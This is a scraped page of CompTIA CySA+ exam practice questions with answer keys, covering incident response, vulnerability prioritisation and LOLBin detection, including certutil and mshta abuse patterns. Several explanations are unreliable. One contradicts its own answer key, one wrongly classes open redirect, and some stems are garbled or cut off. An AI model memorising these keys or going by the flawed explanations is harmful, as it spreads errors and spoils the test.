CompTIA CySA+ CS0-003 (CS0-003) — Questions 676750

989 questions total · 14pages · All types, answers revealed

Page 9

Page 10 of 14

Page 11
676
MCQmedium

A security analyst is using Burp Suite to test an API endpoint. The analyst notices that the API returns detailed error messages when invalid input is provided, revealing database schema information. Which OWASP Top 10 category does this issue primarily relate to?

A.Injection
B.Security Misconfiguration
C.Broken Access Control
D.Cryptographic Failures
AnswerB

Verbose error messages are a classic security misconfiguration that can leak sensitive information.

Why this answer

Detailed error messages revealing internal details are a form of security misconfiguration. The OWASP Top 10 category 'Security Misconfiguration' includes verbose error messages that leak information.

677
MCQhard

During a penetration test, a tester successfully exploits a vulnerability in a web application and gains a shell on the backend server. The tester then attempts to pivot to other hosts. Which of the following security controls would be most effective in limiting lateral movement in this scenario?

A.Host-based intrusion prevention system (HIPS)
B.Full disk encryption
C.Network segmentation with strict firewall rules
D.Application whitelisting
AnswerC

Segmentation limits the ability to connect to other hosts, hindering lateral movement.

Why this answer

Network segmentation with strict firewall rules (C) is the most effective control because it directly restricts the ability of an attacker who has compromised one host to initiate connections to other hosts. By enforcing least-privilege network access between segments (e.g., using VLANs and ACLs), lateral movement techniques such as port scanning, SMB relay, or RDP brute force are blocked at the network layer, regardless of the attacker's shell access.

Exam trap

CompTIA often tests the misconception that endpoint controls like HIPS or application whitelisting are sufficient to stop lateral movement, but the trap here is that once an attacker has a shell, they can often bypass or disable host-based controls, whereas network segmentation is a preventive control that operates independently of the compromised host's state.

How to eliminate wrong answers

Option A is wrong because a host-based intrusion prevention system (HIPS) monitors and blocks malicious behavior on the compromised host itself, but once the attacker has a shell, they can often disable or evade HIPS before pivoting; HIPS does not prevent network-level lateral movement to other hosts. Option B is wrong because full disk encryption protects data at rest on the compromised host's storage, but it does nothing to prevent the attacker from using the host as a pivot point to reach other systems over the network. Option D is wrong because application whitelisting controls which executables can run on the compromised host, but the attacker already has a shell and can use built-in OS tools (e.g., PowerShell, netcat) or living-off-the-land binaries to pivot; whitelisting does not block network connections to other hosts.

678
MCQhard

An analyst suspects a process hollowing attack on an endpoint. Which of the following EDR telemetry findings would best support this hypothesis?

A.A legitimate process (e.g., svchost.exe) created in a suspended state and later resumed with changed memory contents
B.A process with the same name as a Windows system process but running from a temporary directory
C.A process injecting code into a legitimate running process
D.An unknown process making network connections to multiple internal IPs
AnswerA

Creation in suspended state with memory modification is classic hollowing indicator.

Why this answer

Process hollowing involves creating a legitimate process in a suspended state, then replacing its memory with malicious code. This leaves the original path unchanged but the process may exhibit unusual child process behavior.

679
MCQeasy

A company uses a cloud-based identity provider (IdP) for single sign-on (SSO) to all applications. The SOC receives an alert that a user's account logged in from an IP address associated with a country where the company has no offices. The user is currently on a planned vacation and is not in that country. The analyst reviews the authentication logs and sees the login used a valid token and correct multi-factor authentication (MFA) method. Which of the following is the BEST initial step to handle this alert?

A.Review the user's recent activity for other anomalies.
B.Add the IP address to the block list.
C.Contact the user to verify if they logged in.
D.Disable the user account immediately.
AnswerC

Quickest way to confirm if it was the user or a compromise.

Why this answer

Option D is correct because quickly contacting the user can confirm whether the login was authorized (e.g., using a VPN or traveling). Disabling the account or blocking the IP without verification could impact productivity. Option C is a good follow-up but not the first step.

680
Multi-Selecteasy

A security analyst is using a vulnerability scanner to identify missing patches on Windows servers. The scanner uses plugins that reference Common Vulnerabilities and Exposures (CVE) identifiers. Which THREE of the following are components of a CVSS v3.1 base score vector?

Select 3 answers
A.Attack Vector (AV)
B.Confidentiality (C)
C.Privileges Required (PR)
D.Remediation Level (RL)
E.Exploitability (E)
AnswersA, B, C

AV is a base metric.

Why this answer

Attack Vector (AV), Privileges Required (PR), and Confidentiality (C) are all part of the CVSS v3.1 base metric group.

681
MCQeasy

A security analyst is preparing a monthly dashboard for the board of directors. Which metric would best demonstrate the effectiveness of the security program in reducing risk?

A.Number of security incidents detected.
B.Mean time to detect (MTTD) and mean time to respond (MTTR).
C.Percentage of employees who completed security awareness training.
D.Number of firewall rules configured.
AnswerB

These metrics directly reflect the efficiency of detection and response processes.

Why this answer

Mean time to detect (MTTD) and mean time to respond (MTTR) directly quantify the security program's operational efficiency in identifying and containing threats, which reduces the window of exposure and potential damage. A lower MTTD/MTTR indicates faster detection and response, directly correlating with reduced risk from incidents. This makes it the best metric for demonstrating risk reduction effectiveness to the board.

Exam trap

CompTIA often tests the misconception that volume or compliance metrics (like incident count or training completion) directly indicate risk reduction, when in fact operational efficiency metrics (MTTD/MTTR) are the true measure of a security program's effectiveness in minimizing impact.

How to eliminate wrong answers

Option A is wrong because the number of security incidents detected is a volume metric that does not indicate how quickly or effectively incidents are handled; a high number could reflect better detection rather than higher risk, and it provides no insight into response quality. Option C is wrong because the percentage of employees who completed security awareness training is a compliance or training metric that measures awareness, not the operational effectiveness of the security program in detecting and responding to active threats. Option D is wrong because the number of firewall rules configured is a configuration metric that does not measure risk reduction; more rules can increase complexity and attack surface without improving security posture.

682
MCQmedium

During an incident response, the SOC team identifies a data breach involving customer PII. Under GDPR, what is the maximum time frame to notify the supervisory authority?

A.96 hours
B.72 hours
C.24 hours
D.48 hours
AnswerB

Correct under GDPR Article 33.

Why this answer

GDPR Article 33 requires notification within 72 hours of becoming aware of a personal data breach.

683
Multi-Selecthard

A security analyst is investigating a potential advanced persistent threat (APT) that uses living off the land binaries (LOLBins). The EDR has flagged several processes. Which THREE process behaviors are most indicative of LOLBin abuse? (Choose THREE.)

Select 3 answers
A.mshta.exe executing JavaScript from a remote URL
B.explorer.exe opening the Start menu
C.notepad.exe opening a .txt file in the user's Documents folder
D.wmic.exe creating a process on a remote system
E.certutil.exe downloading an executable from a remote server
AnswersA, D, E

Correct. MSHTA can run scripts, often used by attackers.

Why this answer

LOLBin abuse often involves using native tools in unusual ways: wmic for remote execution, mshta for executing malicious scripts, and certutil for downloading payloads. Bitsadmin is also used, but it's less common.

684
MCQeasy

A security analyst is conducting a vulnerability assessment of a web application. The assessment reveals that the application is vulnerable to SQL injection. Which of the following is the MOST effective remediation?

A.Upgrade the web application framework to the latest version
B.Deploy a web application firewall (WAF)
C.Use parameterized queries in the application code
D.Implement client-side input validation
AnswerC

Parameterized queries eliminate SQL injection vulnerabilities.

Why this answer

Parameterized queries (also known as prepared statements) are the most effective remediation for SQL injection because they separate SQL logic from user-supplied data by using placeholders. The database engine treats the input strictly as data, not executable code, which prevents an attacker from altering the query structure. This addresses the root cause at the application layer, unlike other controls that only mitigate or detect the attack.

Exam trap

CompTIA often tests the misconception that a WAF is a sufficient fix for SQL injection, but the trap here is that a WAF is a compensating control, not a remediation—the question asks for the 'most effective remediation,' which must address the root cause in the code.

How to eliminate wrong answers

Option A is wrong because upgrading the web application framework may patch known vulnerabilities but does not fix the insecure coding practice of concatenating user input into SQL statements; the SQL injection flaw remains if the code itself is not changed. Option B is wrong because a web application firewall (WAF) can detect and block some SQL injection payloads, but it is a reactive, signature-based control that can be bypassed with obfuscation or novel attack patterns, and it does not eliminate the underlying vulnerability. Option D is wrong because client-side input validation can be easily bypassed by an attacker using tools like Burp Suite or cURL to send crafted requests directly to the server, and it provides no security against server-side injection.

685
MCQhard

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the evidence source phase, Which evidence source best supports or refutes the detection?

A.Increase the dashboard refresh interval
B.Move logs to cold storage immediately
C.Log normalization and field mapping in the parser
D.Disable all enrichment lookups
AnswerC

Detection rules depend on consistent normalized fields across sources.

Why this answer

Option C is correct because inconsistent field mapping (source IP, user, action) prevents the SIEM from correlating events correctly. Log normalization via a parser ensures that fields from the new cloud log source are transformed into a consistent schema (e.g., ECS or CIM), enabling analytics to function. Without fixing the parser, the data remains unusable regardless of other configuration changes.

Exam trap

The CS0-003 exam often tests the misconception that performance tuning (e.g., refresh intervals) or storage management (e.g., cold storage) can fix data quality issues, when the real problem is a misconfigured parser or normalization step in the ingestion pipeline.

How to eliminate wrong answers

Option A is wrong because increasing the dashboard refresh interval does not address the root cause of inconsistent field mapping; it only changes how often the dashboard updates, which would still show incomplete or misaligned data. Option B is wrong because moving logs to cold storage immediately would archive the data without resolving the parsing issue, making the logs inaccessible for real-time analytics and failing to fix the mapping inconsistency.

686
MCQhard

A business owner accepts delayed remediation for a production system. What must the report include? If the primary audience is legal/privacy stakeholder, which content choice is most appropriate?

A.No mention of the accepted risk
B.Only the analyst's personal opinion
C.Risk owner, reason, compensating controls, review date, and expiry
D.A permanent exception with no review
AnswerC

Risk acceptance must be accountable, time-bound, and visible. The report should be tuned to legal/privacy stakeholder while preserving factual accuracy.

Why this answer

Option C is correct because when a business owner accepts delayed remediation for a production system, the report must formally document the risk acceptance. This includes the risk owner, the reason for accepting the risk, any compensating controls in place, a review date to reassess the risk, and an expiry date for the acceptance. For a legal/privacy stakeholder, this documentation provides an auditable trail that demonstrates due diligence and compliance with regulatory requirements, such as GDPR or HIPAA.

Exam trap

The CS0-003 exam often tests the misconception that a risk acceptance report can simply note the decision without detailing the compensating controls or expiry, leading candidates to choose an incomplete answer that omits critical audit trail elements.

How to eliminate wrong answers

Option A is wrong because omitting the accepted risk from the report would violate audit and compliance standards; legal/privacy stakeholders require full disclosure of all risks to assess liability and regulatory exposure. Option B is wrong because including only the analyst's personal opinion is subjective and lacks the objective, verifiable data needed for legal and privacy review; such opinions are not defensible in an audit or legal proceeding.

687
MCQmedium

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as?

A.Password spraying only
B.MFA fatigue or push-bombing attack
C.DNS tunnelling
D.SSL certificate expiry
AnswerB

Repeated unsolicited prompts that lead to approval are characteristic of MFA fatigue attacks.

Why this answer

Repeated MFA prompts that the user eventually approves out of frustration or habit is the hallmark of MFA fatigue (also called push-bombing). The attacker sends a flood of push notifications to the user's device, hoping the user will mistakenly approve one to stop the annoyance. This bypasses the MFA control without needing to compromise the second factor.

Exam trap

The CS0-003 exam often tests the distinction between 'MFA fatigue' and 'password spraying' — candidates mistakenly choose password spraying because they focus on the repeated attempts, but the key is that the attacker already has the password and is abusing the MFA approval process, not guessing passwords.

How to eliminate wrong answers

Option A is wrong because password spraying involves trying a few common passwords against many accounts, not targeting a single user with repeated MFA prompts. Option C is wrong because DNS tunnelling encodes data in DNS queries/responses to exfiltrate data or establish C2, not to overwhelm a user with MFA approval requests.

688
MCQhard

An organization uses OpenSCAP to perform compliance scanning against STIGs for DoD environments. A scan reveals that several systems are non-compliant with STIG ID: V-XXXXX requiring 'The system must disable the guest account.' The configuration drift detection tool shows that the guest account was re-enabled after a recent patch. What is the MOST effective course of action?

A.Update the system baseline to enforce the guest account disabled state via Group Policy.
B.Apply an exception to the STIG requirement for these systems.
C.Re-run the OpenSCAP scan after the next patch cycle.
D.Manually disable the guest account on each non-compliant system.
AnswerA

Enforcing via Group Policy prevents future drift.

Why this answer

Configuration drift indicates that patches or changes are reverting settings. The most effective action is to update the baseline configuration management tool (e.g., Group Policy) to enforce the setting automatically.

689
Multi-Selectmedium

An incident responder is performing containment of a ransomware incident that has encrypted files on several file servers. Which THREE actions are appropriate for long-term containment and recovery? (Select THREE)

Select 3 answers
A.Blocking the ransomware's command-and-control IP at the firewall
B.Patching the vulnerability exploited by the ransomware
C.Rebuilding affected servers from known-good backups
D.Rotating all service account credentials
E.Isolating the affected network segment
AnswersB, C, D

Patching addresses the root cause and prevents future exploitation.

Why this answer

Long-term containment aims to prevent recurrence and restore normal operations. Rebuilding systems from clean backups ensures removal of malware. Rotating credentials prevents attacker re-entry.

Patching vulnerabilities closes the initial attack vector.

690
Multi-Selecthard

A SIEM correlation rule for impossible travel is creating noise from VPN users. Which refinements should improve fidelity? (Choose two.)

Select 2 answers
A.Disable all identity alerts
B.Require a second signal such as new device, failed MFA, or mailbox rule creation
C.Add trusted VPN egress ranges as named/known locations
D.Treat every VPN login as malicious
AnswersB, C

Combining identity anomalies reduces false positives.

Why this answer

Option B is correct because requiring a second signal—such as a new device, failed MFA, or mailbox rule creation—adds an additional layer of verification that helps confirm the user's identity and intent. This reduces false positives from VPN users whose IP addresses may change rapidly, as the SIEM can now correlate the impossible travel event with other suspicious activities that indicate a genuine compromise rather than a legitimate VPN connection.

Exam trap

The CS0-003 exam often tests the misconception that disabling identity alerts is a valid refinement, but this would eliminate all identity-based detection, whereas the correct approach is to add context (trusted ranges and secondary signals) to reduce noise without losing detection capability.

691
MCQmedium

An organization is implementing a patch management process and wants to track compliance. They deploy patches to a test group of systems before rolling out to the entire environment. After patching the test group, they run a vulnerability scan and find that 95% of the vulnerabilities are resolved. What should the organization do next?

A.Run another scan on the test group in a week to confirm persistence.
B.Immediately deploy the patch to all systems without further testing.
C.Skip full deployment and rely on the test group results.
D.Verify the patch on test systems and then proceed with full deployment through change management.
AnswerD

Verification ensures patches are effective, then change management coordinates rollout.

Why this answer

After successful testing, the next step is to deploy the patch to the rest of the environment, following change management procedures.

692
MCQhard

A security team discovers a critical vulnerability in a widely used software component. The vulnerability has a CVSS score of 9.0, but there is no known exploit or patch available yet. However, the software vendor has released a workaround. According to the vulnerability management lifecycle, which action should the team prioritize first?

A.Wait for the vendor to release a patch before taking any action
B.Remove the affected component from all systems immediately
C.Increase monitoring of the affected systems but take no other action
D.Apply the workaround as a compensating control
AnswerD

Correct; compensating controls reduce risk when a patch is unavailable.

Why this answer

Since no patch is available, the team should apply compensating controls to mitigate the risk. Remediation typically involves patching, but if not possible, compensating controls are the next best step.

693
Multi-Selecthard

A security analyst is prioritizing vulnerabilities from a scan. Which TWO factors should be considered to determine the remediation priority? (Select TWO)

Select 2 answers
A.Exploit code availability
B.Vendor patch availability
C.Number of affected systems
D.CVSS base score
E.Age of the vulnerability
AnswersA, C

Public exploits increase the urgency for remediation.

Why this answer

Exploit code availability is a critical factor because if working exploit code is publicly available, the vulnerability is far more likely to be actively exploited, increasing the risk and urgency for remediation. This directly impacts the likelihood of a breach, making it a key priority driver beyond just the CVSS score.

Exam trap

The CS0-003 exam often tests the misconception that CVSS base score alone determines priority, but the exam emphasizes that exploit availability and asset criticality (here, number of affected systems) are more actionable for remediation prioritization.

694
MCQmedium

A security analyst is reviewing a DAST scan result for a web application. The scanner reports a finding that allows an attacker to redirect users to a malicious site via a parameter in the URL. Which OWASP Top 10 category does this finding most likely belong to?

A.A08:2021 – Software and Data Integrity Failures
B.A03:2021 – Injection
C.A01:2021 – Broken Access Control
D.A05:2021 – Security Misconfiguration
AnswerD

Open redirect is a common security misconfiguration.

Why this answer

Open redirect vulnerabilities are classified under Security Misconfiguration or sometimes under A03:2021 – Injection? Actually OWASP Top 10 2021 includes 'Security Misconfiguration' (A05). Open redirect is typically a security misconfiguration. However, more precisely, it's often considered under 'Broken Access Control'? No, open redirect is not access control.

The closest is Security Misconfiguration because it involves improper handling of redirect parameters.

695
MCQeasy

A security analyst notices a single external IP address attempting to log in to multiple user accounts on the company's VPN server over the past hour. All attempts have failed. What should the analyst do FIRST?

A.Block the IP address at the firewall.
B.Notify law enforcement.
C.Verify the logs and escalate to the incident response team.
D.Disable the VPN server.
AnswerC

Verifying logs confirms the incident, and escalation ensures proper handling.

Why this answer

Option C is correct because the first step in incident response is to verify the logs to confirm the activity is not a false positive (e.g., a misconfigured client or legitimate brute-force testing) and then escalate to the incident response team for coordinated action. This aligns with the NIST SP 800-61 incident response lifecycle, where identification and validation precede containment. Blocking or disabling without verification could disrupt legitimate access or destroy forensic evidence.

Exam trap

CompTIA often tests the candidate's ability to resist the urge to immediately contain or notify external parties; the trap here is choosing a reactive containment step (blocking or disabling) before performing the critical validation and escalation step required by the incident response framework.

How to eliminate wrong answers

Option A is wrong because blocking the IP at the firewall without first verifying the logs may be premature; the IP could be a shared NAT address or a false positive, and blocking it could prevent further analysis or alert the attacker. Option B is wrong because law enforcement is typically notified only after the incident is confirmed, scoped, and deemed criminal in nature; notifying them as a first step wastes resources and may violate chain-of-custody procedures. Option D is wrong because disabling the entire VPN server is an extreme containment measure that would deny service to all legitimate users and should only be considered after verification and as part of a coordinated incident response plan.

696
Multi-Selecthard

A security analyst is performing an API vulnerability test. Which THREE of the following are common API vulnerabilities according to OWASP? (Select THREE.)

Select 3 answers
A.SQL injection in the API endpoint
B.Excessive Data Exposure
C.Cross-Site Request Forgery (CSRF)
D.Mass Assignment
E.Broken Object Level Authorization (BOLA)
AnswersB, D, E

APIs may expose more data than necessary.

Why this answer

Broken object level authorization, excessive data exposure, and mass assignment are common API vulnerabilities per OWASP API Security Top 10.

697
Drag & Dropmedium

Order the steps for setting up a SIEM (Security Information and Event Management) system.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

SIEM setup includes installation, log source configuration, rule definition, log onboarding, and dashboard creation.

698
Multi-Selectmedium

Which findings should be included when reporting remediation performance to asset owners? (Choose two.)

Select 2 answers
A.Recently remediated findings awaiting validation
B.Every raw scanner debug line
C.Unrelated physical-access badge failures
D.Open critical findings past SLA by owner
AnswersA, D

This shows work completed but not yet verified.

Why this answer

Recently remediated findings awaiting validation are a critical metric for asset owners because they confirm that remediation actions have been taken and are pending verification. This aligns with the vulnerability management lifecycle, where validation ensures the fix was applied correctly and no residual risk remains. Including this status in reports provides asset owners with actionable insight into the progress of remediation efforts and any outstanding steps needed to close the finding.

Exam trap

The CS0-003 exam often tests the distinction between operational data (e.g., raw scanner logs) and actionable remediation metrics, tempting candidates to select overly detailed or irrelevant information instead of the concise, status-driven data that asset owners need.

699
MCQhard

A vulnerability report has 900 findings. One medium CVSS vulnerability is listed in CISA KEV and has high EPSS; several high CVSS issues are not exploitable in the environment. What should the analyst recommend? For validation, Which action should be taken before closing or downgrading the finding?

A.Remediate alphabetically by CVE ID
B.Prioritize the KEV/high-EPSS issue after confirming asset exposure
C.Always sort only by CVSS base score
D.Remediate only vulnerabilities with vendor logos in the report
AnswerB

Known exploitation and likelihood can outweigh base CVSS in risk-based prioritization.

Why this answer

Option B is correct because the CISA KEV vulnerability with high EPSS indicates active exploitation in the wild, making it a critical threat regardless of its medium CVSS base score. Prioritizing it after confirming asset exposure ensures the organization addresses the most imminent risk first, as high CVSS issues that are not exploitable in the environment pose no actual danger. This aligns with risk-based vulnerability management, where exploitability and threat intelligence (KEV, EPSS) override raw severity scores.

Exam trap

The CS0-003 exam often tests the misconception that CVSS base score alone determines priority, but the trap here is that real-world risk assessment must incorporate threat intelligence (KEV, EPSS) and environmental context (exploitability) to avoid wasting resources on non-exploitable high-severity issues.

How to eliminate wrong answers

Option A is wrong because remediating alphabetically by CVE ID ignores all risk factors, such as exploitability, asset exposure, and threat intelligence, leading to inefficient and potentially dangerous prioritization. Option C is wrong because sorting only by CVSS base score neglects environmental context (e.g., non-exploitable high CVSS issues) and active exploitation indicators (KEV, EPSS), which are critical for effective vulnerability management.

700
Multi-Selectmedium

An organization is implementing security hardening for Kubernetes clusters. Which THREE of the following are common Kubernetes misconfigurations that should be addressed? (Select THREE)

Select 3 answers
A.Using namespaces to isolate workloads
B.Implementing network policies
C.Using hostPath mounts without restrictions
D.Running containers in privileged mode
E.Overly permissive RBAC roles
AnswersC, D, E

Mounting host paths can lead to host compromise.

Why this answer

Privileged containers, hostPath mounts, and overly permissive RBAC are common Kubernetes security issues. Using namespaces is good practice, not a misconfiguration. Network policies are recommended for segmentation.

701
Multi-Selecthard

A security analyst is creating a compliance dashboard for a PCI DSS audit. Which THREE metrics should be included to demonstrate compliance with access control requirements? (Select THREE.)

Select 3 answers
A.Number of failed login attempts in the last 24 hours
B.Number of critical vulnerabilities in network devices
C.Number of active user accounts with privileged access
D.Percentage of accounts that have been inactive for more than 90 days
E.Percentage of accounts that have undergone access review in the last quarter
AnswersC, D, E

Correct. Tracking privileged accounts is important for access control.

Why this answer

PCI DSS requires strict access controls, including unique IDs, timely deactivation, and periodic reviews. Failed login attempts and vulnerability scan results are not direct access control metrics.

702
MCQhard

During a threat hunting engagement, an analyst creates a hypothesis based on a recent threat intelligence report about a new APT group using DLL side-loading for persistence. The analyst decides to search for processes that have loaded a known vulnerable DLL. Which framework is most appropriate to map the TTPs?

A.Diamond Model
B.NIST CSF
C.MITRE ATT&CK
D.Cyber Kill Chain
AnswerC

ATT&CK provides a detailed taxonomy of techniques used by APT groups.

Why this answer

MITRE ATT&CK is the most comprehensive framework for mapping adversary TTPs, including persistence techniques like DLL side-loading (T1574.002).

703
MCQmedium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Delete historical flow records to reduce SIEM cost
B.Assume encryption means the transfer is safe
C.Correlate flow volume with database audit logs and the destination reputation
D.Disable all outbound internet access for the organisation
AnswerC

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option C is correct because correlating the flow volume with database audit logs allows you to identify which specific records or queries were accessed during the anomalous transfers, while checking the destination reputation helps determine if the unfamiliar AS is known for data exfiltration or is a legitimate service. This combination directly addresses the suspicious behavior—large encrypted outbound transfers during off-hours—by linking network evidence to host-based logs, which is essential for triaging a potential data breach. Without this correlation, you cannot distinguish between a legitimate backup or replication job and malicious exfiltration.

Exam trap

The CS0-003 exam often tests the misconception that encryption implies trustworthiness, but the trap here is that encrypted traffic can still be malicious, and the correct triage step is to correlate network flows with host-based logs and external reputation data rather than assuming safety or destroying evidence.

How to eliminate wrong answers

Option A is wrong because deleting historical flow records destroys forensic evidence and violates data retention policies (e.g., PCI DSS, GDPR), and it does not address the triage need to investigate the suspicious activity. Option B is wrong because encryption does not guarantee safety; attackers commonly use TLS/SSL to exfiltrate data covertly, and the encryption itself is a red flag when combined with off-hours transfers to an unfamiliar AS.

704
MCQeasy

A third-party provider caused an outage during remediation. What should the communication to the vendor focus on? If the primary audience is SOC manager, which content choice is most appropriate?

A.A public press statement draft first
B.Confidential unrelated customer data
C.Timeline, service impact, evidence, required corrective actions, and contractual follow-up
D.Internal blame speculation
AnswerC

Vendor communications should be factual and tied to obligations and remediation. The report should be tuned to SOC manager while preserving factual accuracy.

Why this answer

Option C is correct because when a third-party vendor causes an outage during remediation, the communication must focus on operational and contractual details: the exact timeline of the outage, the scope of service impact (e.g., number of users affected, systems down), evidence (e.g., logs, monitoring alerts), required corrective actions to prevent recurrence, and contractual follow-up (e.g., SLA breach, penalties). This aligns with the SOC manager's need for actionable, factual data to manage incident response and vendor accountability, not public relations or unrelated data.

Exam trap

The CS0-003 exam often tests the distinction between internal operational communication (for SOC managers) and external/public communication (for PR or legal), so candidates mistakenly choose a press statement or irrelevant data instead of the structured incident details required for vendor accountability.

How to eliminate wrong answers

Option A is wrong because a public press statement draft is premature and inappropriate for internal communication to a SOC manager; the primary audience needs technical and operational details, not public messaging. Option B is wrong because sharing confidential unrelated customer data violates data privacy regulations (e.g., GDPR, HIPAA) and is irrelevant to the vendor-caused outage; the communication must focus on the incident itself, not exposing other customer information.

705
Multi-Selecthard

A security team is implementing container security scanning in their CI/CD pipeline. They want to scan container images for vulnerabilities and Kubernetes misconfigurations. Which THREE tools from the following list are best suited for this purpose? (Select THREE)

Select 3 answers
A.Burp Suite
B.Trivy
C.OpenSCAP
D.Clair
E.Snyk
AnswersB, D, E

Trivy is a popular container vulnerability scanner.

Why this answer

Trivy, Clair, and Snyk are all container image scanning tools. OpenSCAP is for compliance scanning of hosts, not containers. Burp Suite is a web application DAST tool.

706
MCQmedium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Assume encryption means the transfer is safe
B.Delete historical flow records to reduce SIEM cost
C.Disable all outbound internet access for the organisation
D.Correlate flow volume with database audit logs and the destination reputation
AnswerD

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option D is correct because correlating the flow volume with database audit logs allows the analyst to verify if the outbound transfers correspond to legitimate database queries or exports, while checking the destination reputation helps determine if the autonomous system is known for malicious activity. This combination provides the clearest triage value by directly linking the network anomaly to potential data exfiltration or a compromised database server, without prematurely disrupting operations or ignoring the encryption indicator.

Exam trap

The trap here is that candidates assume encryption (option A) guarantees safety, but Cisco tests the understanding that encryption can be used to conceal malicious activity, and the correct triage step is to correlate with other logs and threat intelligence rather than making assumptions based on encryption alone.

How to eliminate wrong answers

Option A is wrong because encryption does not imply safety; in fact, encrypted outbound transfers during off-hours to an unfamiliar AS are a classic indicator of data exfiltration (e.g., using TLS to hide stolen data). Option B is wrong because deleting historical flow records destroys forensic evidence and violates retention policies (e.g., PCI DSS, GDPR), and it does not help triage the current alert. Option C is wrong because disabling all outbound internet access is an overly drastic response that would disrupt legitimate business operations and is not a triage step; it should only be considered after analysis confirms a threat.

707
MCQhard

During a post-compromise review, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible? which action should be prioritized before closure?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth consent grant to stop the attacker's access, then review the mailbox for any data exfiltration or rules created, and finally identify other users who may have consented to the same app to contain the incident. This follows the NIST SP 800-61 incident response process for detection and analysis, ensuring the threat is neutralized and scope is understood before moving to eradication and recovery.

Exam trap

CompTIA often tests the misconception that MFA or password resets are sufficient to revoke OAuth app access, but the trap is that OAuth tokens are independent of the user's authentication factor and require explicit grant revocation.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; once the user grants permissions, the app has a token that bypasses MFA entirely. Option B is wrong because deleting all emails destroys forensic evidence and does not address the root cause—the attacker still retains access via the OAuth grant. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token; the app can continue to access the mailbox using its own stored tokens.

708
MCQhard

An analyst is investigating a suspected data exfiltration via HTTP. The analyst examines a PCAP file and finds a series of HTTP POST requests to an external site with varying 'Content-Length' values. The payloads appear to be base64-encoded strings. Which tool would be most effective for extracting and decoding the payloads for analysis?

A.Wireshark
B.Python with scapy
C.tcpdump
D.NetFlow
AnswerB

Scapy allows programmatic extraction of HTTP payloads and base64 decoding, making it ideal for this task.

Why this answer

Python with scapy allows custom scripting to extract and decode payloads from PCAP files.

709
MCQmedium

During a memory analysis of a potentially compromised host, a security analyst finds a process with an executable image that is not present on disk. Which technique is most likely being observed?

A.Reflective DLL injection
B.Process hollowing
C.API hooking
D.DLL injection
AnswerB

Process hollowing replaces the process memory with malicious code, causing the executable to be memory-only.

Why this answer

Process hollowing involves creating a legitimate process in a suspended state, then replacing its memory with malicious code, so the executable in memory may not correspond to a file on disk.

710
MCQhard

Refer to the exhibit. A security analyst is reviewing an S3 bucket policy in AWS. What is the primary security misconfiguration?

A.The bucket policy grants anonymous read access to all objects.
B.The bucket policy allows all actions.
C.The bucket policy does not require encryption.
D.The bucket policy uses an outdated version.
AnswerA

Principal: '*' means anyone, including anonymous users, can read objects.

Why this answer

The bucket policy includes a principal of '*' without any condition restricting access to authenticated users, which grants anonymous (unauthenticated) read access to all objects in the S3 bucket. This violates the principle of least privilege and exposes data to anyone on the internet, making it the primary security misconfiguration.

Exam trap

CompTIA often tests the distinction between a policy that allows 'all actions' versus one that allows 'read access' but with a public principal, tricking candidates into focusing on the action scope rather than the identity granting anonymous access.

How to eliminate wrong answers

Option B is wrong because while the policy allows 's3:GetObject' (not all actions), the core issue is the anonymous principal, not the action scope. Option C is wrong because the policy does not explicitly require encryption, but that is a secondary concern; the primary misconfiguration is the public access grant. Option D is wrong because the policy version (2012-10-17) is current and not outdated; the version field is a syntax requirement, not a security control.

711
MCQmedium

An analyst is investigating a suspected data breach. The analyst needs to identify which files were exfiltrated and preserve evidence. According to the order of volatility, which of the following should the analyst capture FIRST?

A.Contents of the hard drive
B.Network connections and listening ports
C.CPU registers and cache
D.System logs
AnswerC

These are the most volatile and must be captured first.

Why this answer

Order of volatility prioritizes capturing volatile data first. CPU registers and cache are the most volatile, then RAM, swap, disk, etc.

712
Multi-Selecthard

A legal hold is issued during an investigation. Which actions support it? (Choose two.)

Select 2 answers
A.Preserve relevant logs, mailboxes, images, and tickets
B.Let each team decide informally what to delete
C.Purge audit logs to save storage
D.Suspend routine deletion for in-scope evidence
AnswersA, D

Potential evidence must be retained.

Why this answer

A legal hold (litigation hold) requires preservation of all potentially relevant electronically stored information (ESI). Preserving logs, mailboxes, images, and tickets ensures that data is not altered or deleted, maintaining its integrity for forensic analysis and legal proceedings. This action directly supports the hold by preventing spoliation and ensuring compliance with discovery obligations.

Exam trap

The CS0-003 exam often tests the misconception that cost-saving measures (like purging logs) are acceptable during a legal hold, when in fact any deletion—even for legitimate storage management—violates the preservation requirement and can be considered spoliation.

713
MCQmedium

A security analyst is creating a Sigma rule to detect suspicious usage of 'schtasks.exe' to create a scheduled task that runs an encoded PowerShell command. Which log source is most appropriate for this rule?

A.Windows Security Event Log (Event ID 4624)
B.Sysmon Event ID 1 (Process creation)
C.DNS server log
D.Windows PowerShell operational log
AnswerB

Correct. Sysmon Event ID 1 captures process creation with command line.

Why this answer

Sigma rules are written for log sources. Process creation logs (e.g., Event ID 4688 or Sysmon Event ID 1) capture command-line arguments.

714
Multi-Selecthard

A security analyst is performing an API vulnerability test using OWASP ZAP. The analyst finds several issues. Which THREE of the following are common API vulnerabilities according to OWASP? (Select THREE.)

Select 3 answers
A.Broken Object Level Authorization
B.Excessive Data Exposure
C.SQL Injection
D.Cross-Site Scripting (XSS)
E.Broken Authentication
AnswersA, B, E

